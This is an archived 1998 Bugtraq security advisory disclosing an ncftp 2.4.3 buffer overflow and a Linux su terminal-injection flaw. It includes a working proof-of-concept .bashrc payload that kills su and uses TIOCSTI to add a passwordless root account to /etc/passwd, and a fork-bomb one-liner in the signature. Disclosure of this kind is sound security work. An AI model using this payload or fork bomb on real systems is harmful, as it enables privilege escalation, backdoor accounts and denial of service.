Bugtraq mailing list archives
ncftp 2.4.3 overflow / su killing
From: lcamtuf () boss staszic waw pl (Michal Zalewski)
Date: Tue, 24 Mar 1998 17:18:53 +0100
[I posted it already four days ago, but nothing happend] There is a possible buffer overflow in new version of ncftp (2.4.3, released few days ago) - it uses 512-bytes long buffer to store local working directory (sigh!). You may exploit it creating eg. /TEST directory on ftp server with subdirectory eg. xxx(200)xxx/yyy(200)yyy/zzz(200)zzz. It's sufficient to crash ncftp when directory is being retreived using 'get -R /TEST'. Oh, as an addendum... There's a problem with Linux su command, as I described few posts ago (I thought it's ncurses' fault, but I was wrong). ** Big thanks to Nergal for example how to pass anything to shell if we're already controlling terminal input (TIOCSTI). ** If non-root account will be compromised, eg. with lynx/ncftp bug, and .bashrc on this non-root account will be altered to something like that: --- cat >/tmp/a.c <<X #include <sys/ioctl.h> main(){char C[]="\necho 'nergal::0:0::/:/bin/sh'>>/etc/passwd;logout\n";int i=0, P=getppid();kill(P--,9);kill(P,9);for(;i<strlen(C);i++)ioctl(0,TIOCSTI,C+i);} X gcc /tmp/a.c -o/tmp/a;/tmp/a;rm -f /tmp/a ~/.bashrc;clear -- During next su session, "echo '...' >>/etc/passwd" will be executed at root account [hopefully] :) In general, problem lies in ability to killing su itself by unprivledged process - it will still be able to control terminal i/o, because su, when killed with SIGKILL, performs no any tty hangup/reset. So we may parse anything to privledged shell, or do anything else with terminal. So there are 3 bugs: unprivledged process may kill 'su'; 'su' doesn't perform any tty checks; bash also is careless ;) Fix: replace Linux su with smarter one ;) _______________________________________________________________________ Michal Zalewski [lcamtuf () boss staszic waw pl] <= finger for pub PGP key Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch] [echo "\$0&\$0">_;chmod +x _;./_] <=------=> [tel +48 (0) 22 813 25 86]
Current thread:
- RAS 'save password' problems... Aleph One (Mar 20)
- Re: RAS 'save password' problems... David LeBlanc (Mar 22)
- Way to stop /tmp races Pavel Machek (Mar 21)
- Re: RAS 'save password' problems... martin Dolphin (Mar 23)
- buffer overflow with a twist bjorn smedman (Mar 24)
- ncftp 2.4.3 overflow / su killing Michal Zalewski (Mar 24)
- apache+ssl 1.13 symlink problem Ondrej Suchy (Mar 24)
- <Possible follow-ups>
- Re: RAS 'save password' problems... Noam Ben-Yochanan (Mar 22)
- Re: RAS 'save password' problems... martin Dolphin (Mar 22)
- Re: RAS 'save password' problems... David LeBlanc (Mar 22)